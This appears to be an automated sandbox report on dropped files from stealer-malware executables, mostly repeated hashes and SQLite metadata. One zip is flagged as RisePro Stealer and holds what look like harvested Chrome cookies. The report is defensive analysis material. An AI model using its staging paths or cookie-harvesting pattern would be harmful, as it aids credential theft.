                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                      Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2980
                                                                                                                                                                                                                                      Entropy (8bit):7.7461451822919445
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:9c6a8L8DZIrdUuet8RH9iPsaLkjWaZMRzPq6ltjurAIMc6isdmulmRXn3KJ6cCku:x8DMHsPri6RzPhYjeo3R3KJA
                                                                                                                                                                                                                                      MD5:931CDC23ADC85716929244C28E9F3D9D
                                                                                                                                                                                                                                      SHA1:9CB99B749357F4AF1095102A69AAF2A35732C200
                                                                                                                                                                                                                                      SHA-256:253A43A2A0EF6A85FA92C7E72BF2FDBD83448D6A2A6B059E75F74FBBC245F2E6
                                                                                                                                                                                                                                      SHA-512:0D1F33AC8505E0F6D5EA2BD7C1D4338C11FBB43692707A7109B2C92B1E9B4E450AB47AA111BDB219DFB9F7E92D48AE4DCD2F60002D3ED178DCD6F8228D19C331
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\lGaQRZaI9ZBmSkbqM2Ghh6s.zip, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:PK...........X................Cookies\..PK...........X..E.............Cookies\Chrome_Default.txt....P.@.5.....d...`|L2J1l.. .3."_..N.......q..b..=../c.;{.........4F8...0..Y.........Z}Y.g.<w3.f.W(....K.o..l...!*.......y.o;.F..5%.....|0MS.....J.,....../.o...8.H...,M.......;.....I!.z.W....j...e....fE.?.X....6...g...skL.K.85b.U.5...[/.<.h....C..|...C5"{..i.$...'..W).f.O.i..4.....L..Z..t.Z(].2.m.?..<....]........f..I3?.q..8U.6...8.N.y_#Vb...g.k?.Z1.!.3$.....\.%...PK...........X..s.(...........information.txt.Y.o.H..G..h.^.....m..a...,7.$...=...k..l.dr..}.m...GT"$...._U...$.Gd..q....n.2..a....>......\....B..#...\.&a.I2s.yD..^.`.y:.H...2...%(cK.[.T.{_.j...BD..t.Y...3f.G...T...O.._.....Vf..P..V....+..(..Y.L\.9....G.w%x....<+..v;p |.#.....lw............C.l..E^. ...%'..Y.w...,..IQ[q3.....|.7T..wT6.w....*..*........}...4-.Gd..,...9|!..i...g-.....n_...'.BJ. P....../.owS`.m>,7.C..r..?..y.o,a.......G.....6.l0.......<,.....*[.I.!gwYR..|M.u.o.._.5.H.mR..O
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                      Entropy (8bit):2.873140679513133
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Lykd:ekd
                                                                                                                                                                                                                                      MD5:7E54891CC4DF22F619FB7A98994CC40B
                                                                                                                                                                                                                                      SHA1:5C479C774970B65721BE43AC0C0AF7A23E0B9F27
                                                                                                                                                                                                                                      SHA-256:5110721FF72679A9774ABD7742C4D2AD48EF56F5FA14BEB9351DC09E6B36E29A
                                                                                                                                                                                                                                      SHA-512:F60012E70FA18FD621A2070D19919539DE1A3C289B96250C05F490BC68F8ADD8A668683C8BD60939A0C0B8D80F449D7ABC6F832CD4801895988CA2EDC7DBC52B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:1713495923798
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
